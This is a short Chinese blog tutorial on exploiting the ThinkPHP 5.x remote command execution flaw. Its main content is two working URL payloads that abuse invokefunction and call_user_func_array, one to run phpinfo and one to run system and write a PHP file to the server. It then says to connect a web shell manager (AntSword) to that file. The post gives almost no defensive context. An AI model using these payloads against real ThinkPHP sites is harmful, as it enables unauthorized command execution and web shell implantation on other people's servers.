常见框架漏洞:Thinkphp(TP)篇

与神明画鸭2025-03-26 7:04

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码 
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码 
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
网络研究院6 天前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
蓝黑202012 天前
阿里云ECS服务器搭建ThinkPHP环境
服务器·阿里云·thinkphp
网络研究院15 天前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年19 天前
CVE-2014-6271(bash破壳漏洞 )
漏洞
网络研究院19 天前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞
IT 青年1 个月前
CVE-2020-24557
漏洞
第十六年盛夏.1 个月前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
奔跑吧邓邓子1 个月前
从0到1学PHP(十二):PHP 框架入门与项目实战
php·框架·laravel·项目实战·thinkphp·yii
IT 青年1 个月前
CVE-2021-21148
漏洞
奔跑吧邓邓子2 个月前
PHPStorm携手ThinkPHP8:开启高效开发之旅
phpstorm·php开发·thinkphp·thinkphp8
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路032025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定042025高教社杯国赛数学建模选题建议+初步分析05UV安装并设置国内源062025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定07奈飞工厂官网,国内Netflix影视在线看|中文网页电脑版入口08KGG转MP3工具|非KGM文件|解密音频09(E题|AI 辅助智能体测)2025年高教杯全国大学生数学建模国赛解题思路|完整代码论文集合10A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程